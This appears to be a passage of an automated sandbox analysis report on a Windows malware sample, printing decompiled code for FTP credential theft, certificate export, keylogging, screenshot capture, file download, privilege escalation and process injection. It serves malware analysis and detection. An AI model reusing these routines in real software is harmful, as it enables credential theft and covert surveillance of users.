0x00000000
0x00000000
0x004054ab
0x004054ad
0x004054b3
0x00000000
0x004054b9
0x004054b9
0x004054c4
0x004054cc
0x004054d5
0x004055a9
0x004055af
0x004055b4
0x004055ba
0x004054d7
0x004054db
0x004054f1
0x00405507
0x0040550d
0x00405517
0x00405523
0x00405539
0x00405541
0x00405557
0x0040555d
0x0040556b
0x0040556d
0x00405571
0x00405577
0x00405580
0x00405581
0x00405582
0x0040558b
0x00405590
0x00405595
0x00405598
0x004055a4
0x004055a6
0x004055a6
0x004055a4
0x00405595
0x0040556b
0x00405557
0x00405539
0x00405517
0x00000000
0x004055c0
0x004055c4
0x00000000
0x004055c4
0x004055ba
0x00405436
0x0040543d
0x00000000
0x0040543d

APIs

Part of subcall function 0040B635: PathCombineW.SHLWAPI(?,?,00401EC0,004076D9,?,?,?,00000000), ref: 0040B64C

HeapAlloc.KERNEL32(00000008,00020002,?), ref: 0040545A
GetPrivateProfileStringW.KERNEL32 ref: 0040547E
HeapAlloc.KERNEL32(00000008,00000C20), ref: 004054A9
GetPrivateProfileStringW.KERNEL32 ref: 004054ED
GetPrivateProfileIntW.KERNEL32 ref: 00405507
GetPrivateProfileStringW.KERNEL32 ref: 00405535
GetPrivateProfileStringW.KERNEL32 ref: 00405553

Strings

pass, xrefs: 0040554A
ftp://%s:%s@%s:%u, xrefs: 00405586
user, xrefs: 0040552C
port, xrefs: 004054FE

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: PrivateProfile$String$AllocHeap$CombinePath
String ID: ftp://%s:%s@%s:%u$pass$port$user
API String ID: 3432043379-2696999094
Opcode ID: 4212a90c89c6ed554a8e16240747d78768c1d2de7a9de229284e73204cd694f9
Instruction ID: 72fe7dc15f22425cf4ee1af48bbec92acf04fd879257a37779c6b1a9e5182891
Opcode Fuzzy Hash: 4212a90c89c6ed554a8e16240747d78768c1d2de7a9de229284e73204cd694f9
Instruction Fuzzy Hash: BD418F71144706BBD7109F61CC81FABB7E9FB88704F10093AB984B22E1D778E9198F5A

Uniqueness

Uniqueness Score: -1.00%

Function 0041267A, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 112encryptiontimeCOMMON

Download Yara Rule

APIs

CertOpenSystemStoreW.CRYPT32(00000000,00402B6C), ref: 00412695
CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 004126B1
CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 004126BD
PFXExportCertStoreEx.CRYPT32(?,?,pass,00000000,00000004), ref: 004126F1
PFXExportCertStoreEx.CRYPT32(?,?,pass,00000000,00000004), ref: 00412725
CharLowerW.USER32 ref: 00412741
GetSystemTime.KERNEL32(?), ref: 0041274C

Part of subcall function 004097CC: HeapAlloc.KERNEL32(00000008,-00000004,0040F499,00000000,?,?,?,?,00407564,00000000,00407832,?,00000000), ref: 004097D8

CertCloseStore.CRYPT32(?,00000000), ref: 004127AE

Strings

pass, xrefs: 004126DA, 004126DF, 0041271B
certs\%s_%02u_%02u_%04u.pfx, xrefs: 00412769

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: CertStore$CertificatesEnumExportSystem$AllocCharCloseHeapLowerOpenTime
String ID: certs\%s_%02u_%02u_%04u.pfx$pass
API String ID: 3339301666-1785743025
Opcode ID: 66c63be07a13ea0a04fe17957175bb7b27f48ad151267107066884165e491052
Instruction ID: a9b3bcabc72352b6f95679d30d7f69f4e91b295b04b34c8c8467c1bd49037814
Opcode Fuzzy Hash: 66c63be07a13ea0a04fe17957175bb7b27f48ad151267107066884165e491052
Instruction Fuzzy Hash: 59312975504341AEC7119F658E84EBB7BECAB84314F04093FF9D4E21D1C678CD94876A

Uniqueness

Uniqueness Score: -1.00%

Function 00412AC1, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00412AC1(MSG* _a4) {
				char _v524;
				char _v780;
				short _v800;
				void* __edi;
				void* __esi;
				int _t20;
				signed int _t22;
				signed int _t27;
				char* _t32;
				MSG* _t40;
				char* _t46;
				intOrPtr* _t50;
				signed int _t51;
				void* _t53;

				_t53 = (_t51 & 0xfffffff8) - 0x31c;
				_t40 = _a4;
				if(_t40 == 0 || E00407B3F() == 0) {
					L20:
					E00407B30();
					return TranslateMessage(_t40);
				} else {
					_t20 = _t40->message;
					if(_t20 != 0x201) {
						__eflags = _t20 - 0x100;
						if(_t20 != 0x100) {
							goto L20;
						}
						__eflags = _t40->wParam - 0x1b;
						if(_t40->wParam == 0x1b) {
							goto L20;
						}
						_t22 = GetKeyboardState( &_v780);
						__eflags = _t22;
						if(_t22 == 0) {
							goto L20;
						}
						_t27 = ToUnicode(_t40->wParam, _t40->lParam & 0x000000ff,  &_v780,  &_v800, 9, 0);
						__eflags = _t27;
						if(_t27 <= 0) {
							goto L20;
						}
						__eflags = _t27 - 1;
						if(__eflags != 0) {
							if(__eflags > 0) {
								L18:
								__eflags = 0;
								 *((short*)(_t53 + 0xc + _t27 * 2)) = 0;
								_push( &_v800);
								L19:
								E00412923();
								goto L20;
							}
							L17:
							__eflags = _v800 - 0x20;
							if(_v800 < 0x20) {
								goto L20;
							}
							goto L18;
						}
						__eflags = _t40->wParam - 8;
						if(_t40->wParam != 8) {
							goto L17;
						}
						_push(0x402be4);
						goto L19;
					}
					EnterCriticalSection(0x41aa20);
					if( *0x41aa18 > 0) {
						 *0x41aa18 =  *0x41aa18 + 0xffff;
						_t50 = E00411408(L"image/jpeg", 0x1e, 0x1f4);
						if(_t50 != 0) {
							_t32 =  *0x41aa10; // 0x0
							_t46 =  &M0040269C;
							if(_t32 != 0) {
								_t46 = _t32;
							}
							E0040A4B7(_t33, 0x104,  &_v524, L"screenshots\\%s\\%04x_%08x.jpg");
							E0041249C(0x104, _t50,  &_v524);
							 *((intOrPtr*)( *_t50 + 8))(_t50, _t46,  *0x419544, GetTickCount());
						}
					}
					LeaveCriticalSection(0x41aa20);
					goto L20;
				}
			}

0x00412ac7
0x00412ace
0x00412ad5
0x00412bee
0x00412bee
0x00412c00
0x00412ae8
0x00412ae8
0x00412af0
0x00412b80
0x00412b85
0x00000000
0x00000000
0x00412b87
0x00412b8b
0x00000000
0x00000000
0x00412b92
0x00412b98
0x00412b9a
0x00000000
0x00000000
0x00412bb7
0x00412bbd
0x00412bbf
0x00000000
0x00000000
0x00412bc1
0x00412bc4
0x00412bd3
0x00412bdd
0x00412bdd
0x00412bdf
0x00412be8
0x00412be9
0x00412be9
0x00000000
0x00412be9
0x00412bd5
0x00412bd5
0x00412bdb
0x00000000
0x00000000
0x00000000
0x00412bdb
0x00412bc6
0x00412bca
0x00000000
0x00000000
0x00412bcc
0x00000000
0x00412bcc
0x00412afb
0x00412b09
0x00412b17
0x00412b28
0x00412b2c
0x00412b2e
0x00412b33
0x00412b3a
0x00412b3c
0x00412b3c
0x00412b5d
0x00412b68
0x00412b70
0x00412b70
0x00412b2c
0x00412b78
0x00000000
0x00412b78

APIs

TranslateMessage.USER32(?), ref: 00412BF4

Part of subcall function 00407B3F: WaitForSingleObject.KERNEL32(00000000,004157E2,19367400,00000001), ref: 00407B47

EnterCriticalSection.KERNEL32(0041AA20), ref: 00412AFB
LeaveCriticalSection.KERNEL32(0041AA20), ref: 00412B78

Part of subcall function 00411408: LoadLibraryA.KERNEL32(gdiplus.dll,00000000,?,00000000), ref: 0041143A
Part of subcall function 00411408: GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0041144B
Part of subcall function 00411408: GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 00411458
Part of subcall function 00411408: GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromHBITMAP), ref: 00411465
Part of subcall function 00411408: GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 00411472
Part of subcall function 00411408: GetProcAddress.KERNEL32(00000000,GdipGetImageEncodersSize), ref: 0041147F
Part of subcall function 00411408: GetProcAddress.KERNEL32(00000000,GdipGetImageEncoders), ref: 0041148C
Part of subcall function 00411408: GetProcAddress.KERNEL32(00000000,GdipSaveImageToStream), ref: 00411499
Part of subcall function 00411408: LoadLibraryA.KERNEL32(ole32.dll), ref: 004114E1
Part of subcall function 00411408: GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 004114EC
Part of subcall function 00411408: LoadLibraryA.KERNEL32(gdi32.dll), ref: 004114FE
Part of subcall function 00411408: GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 00411509
Part of subcall function 00411408: GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 00411515
Part of subcall function 00411408: GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 00411522
Part of subcall function 00411408: GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 0041152F
Part of subcall function 00411408: GetProcAddress.KERNEL32(00000000,SelectObject), ref: 0041153C
Part of subcall function 00411408: GetProcAddress.KERNEL32(00000000,BitBlt), ref: 00411549
Part of subcall function 00411408: GetProcAddress.KERNEL32(00000000,DeleteObject), ref: 00411556

GetTickCount.KERNEL32 ref: 00412B3E
GetKeyboardState.USER32(?), ref: 00412B92
ToUnicode.USER32 ref: 00412BB7

Strings

, xrefs: 00412BD5
screenshots\%s\%04x_%08x.jpg, xrefs: 00412B51
image/jpeg, xrefs: 00412B1E
unknown, xrefs: 00412B33, 00412B50

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$CriticalSection$CountEnterKeyboardLeaveMessageObjectSingleStateTickTranslateUnicodeWait
String ID: $image/jpeg$screenshots\%s\%04x_%08x.jpg$unknown
API String ID: 2762424063-35585939
Opcode ID: 1b146a80f41092f82f8b3871739d025665800b86e48d677a628edcdbcc50abf9
Instruction ID: 13950b7b8cf7d50df6825d4623fc95f113c51a662aff149dfa552fe96330cf05
Opcode Fuzzy Hash: 1b146a80f41092f82f8b3871739d025665800b86e48d677a628edcdbcc50abf9
Instruction Fuzzy Hash: A831A33160820567D720AF55DE49AEB77A8EF44724F14443BF800FA2A1D6BCE9E0C76E

Uniqueness

Uniqueness Score: -1.00%

Function 0040F61D, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 90
libraryloaderprocessCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040F61D(void* _a4, WCHAR* _a8) {
				WCHAR* _v5;
				char _v12;
				signed int _v16;
				struct HINSTANCE__* _v20;
				_Unknown_base(*)()* _v24;
				struct _PROCESS_INFORMATION _v40;
				struct _STARTUPINFOW _v108;
				struct HINSTANCE__* _t28;
				_Unknown_base(*)()* _t31;
				WCHAR* _t49;
				long _t50;
				intOrPtr* _t52;

				_v5 = 0;
				_t28 = LoadLibraryA("userenv.dll");
				_v20 = _t28;
				if(_t28 != 0) {
					_t52 = GetProcAddress(_t28, "CreateEnvironmentBlock");
					_t31 = GetProcAddress(_v20, "DestroyEnvironmentBlock");
					_v24 = _t31;
					if(_t52 != 0 && _t31 != 0) {
						_push(0);
						_push(_a4);
						_push( &_v16);
						_v16 = 0;
						if( *_t52() == 0) {
							_v16 = 0;
						}
						_t50 = 0x44;
						_v12 = 0;
						E004098AA( &_v108,  &_v108, 0, _t50);
						_t49 = _a8;
						_v108.cb = _t50;
						_v108.lpDesktop = 0;
						if(_t49 == 0) {
							_t49 =  &_v12;
						}
						asm("sbb eax, eax");
						if(CreateProcessAsUserW(_a4, 0, _t49, 0, 0, 0,  ~_v16 & 0x00000400 | 0x04000000, _v16, 0,  &_v108,  &_v40) != 0) {
							CloseHandle(_v40.hThread);
							CloseHandle(_v40);
							_v5 = _v40.dwProcessId != 0;
						}
						if(_v16 != 0) {
							_v24(_v16);
						}
					}
					FreeLibrary(_v20);
				}
				return _v5 & 0x000000ff;
			}

0x0040f62b
0x0040f62e
0x0040f634
0x0040f639
0x0040f657
0x0040f659
0x0040f65b
0x0040f660
0x0040f66e
0x0040f66f
0x0040f675
0x0040f676
0x0040f67d
0x0040f67f
0x0040f67f
0x0040f684
0x0040f688
0x0040f691
0x0040f696
0x0040f699
0x0040f69c
0x0040f6a1
0x0040f6a3
0x0040f6a3
0x0040f6b5
0x0040f6d2
0x0040f6dd
0x0040f6e2
0x0040f6e7
0x0040f6e7
0x0040f6ee
0x0040f6f3
0x0040f6f3
0x0040f6ee
0x0040f6f9
0x0040f700
0x0040f707

APIs

LoadLibraryA.KERNEL32(userenv.dll,?), ref: 0040F62E
GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 0040F64D
GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 0040F659
CreateProcessAsUserW.ADVAPI32(?,00000000,004084FD,00000000,00000000,00000000,004084FD,004084FD,00000000,?,?,?,00000000,00000044), ref: 0040F6CA
CloseHandle.KERNEL32(?), ref: 0040F6DD
CloseHandle.KERNEL32(?), ref: 0040F6E2
FreeLibrary.KERNEL32(?), ref: 0040F6F9

Strings

CreateEnvironmentBlock, xrefs: 0040F647
userenv.dll, xrefs: 0040F626
DestroyEnvironmentBlock, xrefs: 0040F64F

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: AddressCloseHandleLibraryProc$CreateFreeLoadProcessUser
String ID: CreateEnvironmentBlock$DestroyEnvironmentBlock$userenv.dll
API String ID: 3080530829-1103369309
Opcode ID: 8264edb7844af7ea635a57b201bb4f1374cc20cc2e818b7280bef1f0d9bfb00f
Instruction ID: afb527d5c19ea0ab62fb7aedeab92b7570d227b6203c03c99381df5b737a3347
Opcode Fuzzy Hash: 8264edb7844af7ea635a57b201bb4f1374cc20cc2e818b7280bef1f0d9bfb00f
Instruction Fuzzy Hash: 29211A72D0021DAFDF109FA5CD849EEBBB9EF48344F14847AE500B61A0D6799E49CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040B4D8, Relevance: 10.6, APIs: 7, Instructions: 109
sleepfilesynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040B4D8(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, signed char _a8, intOrPtr _a12, intOrPtr _a16, void* _a20, long _a24, long _a28) {
				short _v524;
				struct _WIN32_FIND_DATAW _v1116;
				intOrPtr _v1120;
				intOrPtr _v1124;
				void* _v1128;
				int _t51;
				signed int _t60;
				long _t68;
				signed char _t71;
				signed int _t83;

				_v1120 = __edx;
				_v1124 = __ecx;
				_t51 = E0040B635("*",  &_v524, __ecx);
				if(_t51 == 0) {
					L25:
					return _t51;
				}
				_t51 = FindFirstFileW( &_v524,  &_v1116);
				_v1128 = _t51;
				if(_t51 != 0xffffffff) {
					_t71 = _a8;
					while(1) {
						_t83 = 0;
						if(_a20 != 0 && WaitForSingleObject(_a20, 0) != 0x102) {
							break;
						}
						if(E0040B2FC( &(_v1116.cFileName)) != 0) {
							L23:
							if(FindNextFileW(_v1128,  &_v1116) != 0) {
								continue;
							}
							break;
						}
						_t60 = _v1116.dwFileAttributes & 0x00000010;
						if(_t60 == 0 || (_t71 & 0x00000002) == 0) {
							if(_t60 != _t83 || (_t71 & 0x00000004) == 0) {
								goto L17;
							} else {
								goto L10;
							}
						} else {
							L10:
							if(_a4 <= 0) {
								L17:
								if((_v1116.dwFileAttributes & 0x00000010) != 0 && (_t71 & 0x00000001) != 0 && E0040B635( &(_v1116.cFileName),  &_v524, _v1124) != 0) {
									_t103 = _a24;
									if(_a24 != 0) {
										Sleep(_a24);
									}
									E0040B4D8( &_v524, _v1120, _t103, _a4, _t71, _a12, _a16, _a20, _a24, _a28);
								}
								goto L23;
							}
							while(PathMatchSpecW( &(_v1116.cFileName),  *(_v1120 + _t83 * 4)) == 0) {
								_t83 = _t83 + 1;
								if(_t83 < _a4) {
									continue;
								}
								goto L17;
							}
							_t68 = _a12(_a16);
							__eflags = _t68;
							if(_t68 == 0) {
								break;
							}
							__eflags = _a28;
							if(_a28 != 0) {
								Sleep(_a28);
							}
							goto L17;
						}
					}
					_t51 = FindClose(_v1128);
				}
			}

0x0040b4f5
0x0040b4f9
0x0040b4fd
0x0040b504
0x0040b62c
0x0040b632
0x0040b632
0x0040b517
0x0040b51d
0x0040b524
0x0040b52a
0x0040b533
0x0040b533
0x0040b538
0x00000000
0x00000000
0x0040b55a
0x0040b60b
0x0040b61c
0x00000000
0x00000000
0x00000000
0x0040b61c
0x0040b564
0x0040b567
0x0040b570
0x00000000
0x00000000
0x00000000
0x00000000
0x0040b577
0x0040b577
0x0040b57b
0x0040b5b8
0x0040b5bd
0x0040b5dd
0x0040b5e1
0x0040b5e6
0x0040b5e6
0x0040b606
0x0040b606
0x00000000
0x0040b5bd
0x0040b57d
0x0040b593
0x0040b597
0x00000000
0x00000000
0x00000000
0x0040b599
0x0040b5a6
0x0040b5a9
0x0040b5ab
0x00000000
0x00000000
0x0040b5ad
0x0040b5b1
0x0040b5b6
0x0040b5b6
0x00000000
0x0040b5b1
0x0040b567
0x0040b626
0x0040b626

APIs

Part of subcall function 0040B635: PathCombineW.SHLWAPI(?,?,00401EC0,004076D9,?,?,?,00000000), ref: 0040B64C

FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040B517
WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040B53E
PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0040B589
Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 0040B5B6
Sleep.KERNEL32(00000000,?,?), ref: 0040B5E6
FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0040B614
FindClose.KERNEL32(?,?,?,?,00000000), ref: 0040B626

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
String ID:
API String ID: 2348139788-0
Opcode ID: b6408d2e735705dc498f71382424c17b71c6ae71ece8321909fa7e05c4e6c160
Instruction ID: d5b712001275de6e6bbc6900295be6dd5e38ba9740441f89fc6e4bf5f92aa16b
Opcode Fuzzy Hash: b6408d2e735705dc498f71382424c17b71c6ae71ece8321909fa7e05c4e6c160
Instruction Fuzzy Hash: 46416C31004209ABCB21DF15DD48AEF7BA9EF54348F04493AF994A22E1D33AC955CBDE

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC31, Relevance: 10.6, APIs: 7, Instructions: 78
filememorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AC31(void* __edi, void* _a4, WCHAR* _a8, intOrPtr _a12, void* _a16) {
				char _v5;
				long _v12;
				struct _OVERLAPPED* _v16;
				long _v20;
				long _t32;
				void* _t37;
				void* _t39;

				_v5 = 0;
				_t39 = CreateFileW(_a8, 0x40000000, 1, 0, 2, 0x80, 0);
				if(_t39 == 0xffffffff) {
					L15:
					return _v5;
				}
				_t37 = HeapAlloc( *0x41a570, 8, 0x1004);
				if(_t37 == 0) {
					L13:
					CloseHandle(_t39);
					if(_v5 == 0) {
						E0040B1CD(_a8);
					}
					goto L15;
				}
				_v16 = 0;
				while(_a16 == 0 || WaitForSingleObject(_a16, 0) == 0x102) {
					if(InternetReadFile(_a4, _t37, 0x1000,  &_v12) == 0) {
						break;
					}
					if(_v12 == 0) {
						FlushFileBuffers(_t39);
						_v5 = 1;
						break;
					}
					if(WriteFile(_t39, _t37, _v12,  &_v20, 0) == 0) {
						break;
					}
					_t32 = _v12;
					if(_t32 != _v20) {
						break;
					}
					_v16 = _v16 + _t32;
					if(_v16 <= _a12) {
						continue;
					}
					break;
				}
				E004097F7(_t37);
				goto L13;
			}

0x0040ac4e
0x0040ac57
0x0040ac5c
0x0040ad00
0x0040ad06
0x0040ad06
0x0040ac76
0x0040ac7a
0x0040aceb
0x0040acec
0x0040acf6
0x0040acfb
0x0040acfb
0x00000000
0x0040acf6
0x0040ac7c
0x0040ac7f
0x0040acaa
0x00000000
0x00000000
0x0040acaf
0x0040acdb
0x0040ace1
0x00000000
0x0040ace1
0x0040acc3
0x00000000
0x00000000
0x0040acc5
0x0040accb
0x00000000
0x00000000
0x0040accd
0x0040acd6
0x00000000
0x00000000
0x00000000
0x0040acd8
0x0040ace6
0x00000000

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?,00000000), ref: 0040AC51
HeapAlloc.KERNEL32(00000008,00001004,?), ref: 0040AC70
WaitForSingleObject.KERNEL32(?,00000000), ref: 0040AC88
InternetReadFile.WININET(00001000,00000000,00001000,?), ref: 0040ACA2
WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0040ACBB
FlushFileBuffers.KERNEL32(00000000), ref: 0040ACDB
CloseHandle.KERNEL32(00000000), ref: 0040ACEC

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: File$AllocBuffersCloseCreateFlushHandleHeapInternetObjectReadSingleWaitWrite
String ID:
API String ID: 1233354954-0
Opcode ID: 4abc84ec0f68d5ea7011612451a45859c485fc274f22e527342a963b6f171b32
Instruction ID: e79d506053f7ffdfb1374d78e525d9b90c9f02b8df8a49fd2312fd9f7de9dc44
Opcode Fuzzy Hash: 4abc84ec0f68d5ea7011612451a45859c485fc274f22e527342a963b6f171b32
Instruction Fuzzy Hash: 50218E31904248BFEB119FA09D88FEE7B79AB04345F004076F551B51E0D7758D518B29

Uniqueness

Uniqueness Score: -1.00%

Function 0040F3C3, Relevance: 10.6, APIs: 7, Instructions: 52
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F3C3(WCHAR* _a4) {
				void* _v12;
				intOrPtr _v16;
				struct _TOKEN_PRIVILEGES _v28;
				int _t23;

				_t23 = 0;
				if(OpenThreadToken(GetCurrentThread(), 0x20, 0,  &_v12) != 0 || OpenProcessToken(0xffffffff, 0x20,  &_v12) != 0) {
					_v28.PrivilegeCount = 1;
					_v16 = 2;
					if(LookupPrivilegeValueW(_t23, _a4,  &(_v28.Privileges)) != 0 && AdjustTokenPrivileges(_v12, _t23,  &_v28, _t23, _t23, _t23) != 0 && GetLastError() == 0) {
						_t23 = 1;
					}
					CloseHandle(_v12);
					return _t23;
				} else {
					return 0;
				}
			}

0x0040f3ce
0x0040f3e2
0x0040f401
0x0040f409
0x0040f418
0x0040f439
0x0040f439
0x0040f43e
0x00000000
0x0040f3f6
0x00000000
0x0040f3f6

APIs

GetCurrentThread.KERNEL32 ref: 0040F3D3
OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,00408579,SeTcbPrivilege), ref: 0040F3DA
OpenProcessToken.ADVAPI32(000000FF,00000020,?,?,?,?,?,?,?,?,?,?,00408579,SeTcbPrivilege), ref: 0040F3EC
LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0040F410
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 0040F425
GetLastError.KERNEL32 ref: 0040F42F
CloseHandle.KERNEL32(?), ref: 0040F43E

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: Token$OpenThread$AdjustCloseCurrentErrorHandleLastLookupPrivilegePrivilegesProcessValue
String ID:
API String ID: 2724707430-0
Opcode ID: 9808f44915c8353e77b4deb8c92dc371a5df8136a0e02c3f94ef8c4451c43ed2
Instruction ID: 76f9c6986d007174225d6d0a11d3fa3f2352e79778f526c23601cc0702b074ff
Opcode Fuzzy Hash: 9808f44915c8353e77b4deb8c92dc371a5df8136a0e02c3f94ef8c4451c43ed2
Instruction Fuzzy Hash: 8E0140B1600208BFEB109FA18D89FEF7B7CEB14344F000136F901F15A0E73489898A39

Uniqueness

Uniqueness Score: -1.00%

Function 004034F6, Relevance: 9.1, APIs: 6, Instructions: 81
threadnativeinjectionCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E004034F6(void* __edx, void** _a4, void** _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, void* _a32, intOrPtr _a36, intOrPtr _a40, void* _a44) {
				struct _CONTEXT _v720;
				void* __edi;
				void* __esi;
				intOrPtr _t30;
				void* _t34;
				void* _t35;
				void** _t43;
				void* _t44;
				void* _t45;
				void** _t48;
				void* _t50;
				void* _t51;
				intOrPtr _t53;
				void* _t63;

				_t45 = __edx;
				E00407B30();
				_t43 = _a4;
				_t30 =  *0x4192f4(_t43, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44);
				_a40 = _t30;
				if(_t30 >= 0 && (_a32 & 0x00000001) != 0 && _t43 != 0 && _a8 != 0 && E00407B3F() != 0 && GetProcessId( *_t43) != 0) {
					_t34 = E0040797B(_t44, _t45, _t33);
					_a44 = _t34;
					_t61 = _t34;
					if(_t34 != 0) {
						_push(_t50);
						_t35 = E00407A4C(_t44,  *_t43, _t50, _t61, _t34, 0);
						_t48 = _a8;
						_t51 = _t35;
						_a32 = _t51;
						_t53 = _t51 -  *0x4192e4 + E00407F43;
						_v720.ContextFlags = 0x10003;
						if(GetThreadContext( *_t48,  &_v720) == 0) {
							L10:
							VirtualFreeEx( *_t43, _a32, 0, 0x8000);
						} else {
							_t63 = _v720.Eip -  *0x419300; // 0x77e5ba60
							if(_t63 != 0) {
								goto L10;
							} else {
								_v720.Eax = _t53;
								_v720.ContextFlags = 0x10002;
								if(SetThreadContext( *_t48,  &_v720) == 0) {
									goto L10;
								}
							}
						}
						CloseHandle(_a44);
					}
				}
				return _a40;
			}

0x004034f6
0x00403500
0x00403508
0x00403527
0x0040352d
0x00403532
0x00403572
0x00403577
0x0040357a
0x0040357c
0x00403582
0x00403589
0x0040358e
0x00403591
0x00403599
0x004035a5
0x004035ab
0x004035bd
0x004035f0
0x004035fc
0x004035bf
0x004035c5
0x004035cb
0x00000000
0x004035cd
0x004035d6
0x004035dc
0x004035ee
0x00000000
0x00000000
0x004035ee
0x004035cb
0x00403605
0x0040360c
0x0040357c
0x00403612

APIs

Part of subcall function 00407B30: WaitForSingleObject.KERNEL32(000000FF,004034D2), ref: 00407B38

NtCreateUserProcess.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00403527

Part of subcall function 00407B3F: WaitForSingleObject.KERNEL32(00000000,004157E2,19367400,00000001), ref: 00407B47

GetProcessId.KERNEL32(?), ref: 00403563

Part of subcall function 0040797B: CreateMutexW.KERNEL32(0041930C,00000001,?,0041954C,?,?,00000002,?), ref: 004079C2

GetThreadContext.KERNEL32(00000000,?,00000000,00000000,?,?,00000000), ref: 004035B5
SetThreadContext.KERNEL32(00000000,00010003,?,?,00000000), ref: 004035E6
VirtualFreeEx.KERNEL32(?,00000001,00000000,00008000,?,?,00000000), ref: 004035FC
CloseHandle.KERNEL32(?,?,?,00000000), ref: 00403605

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
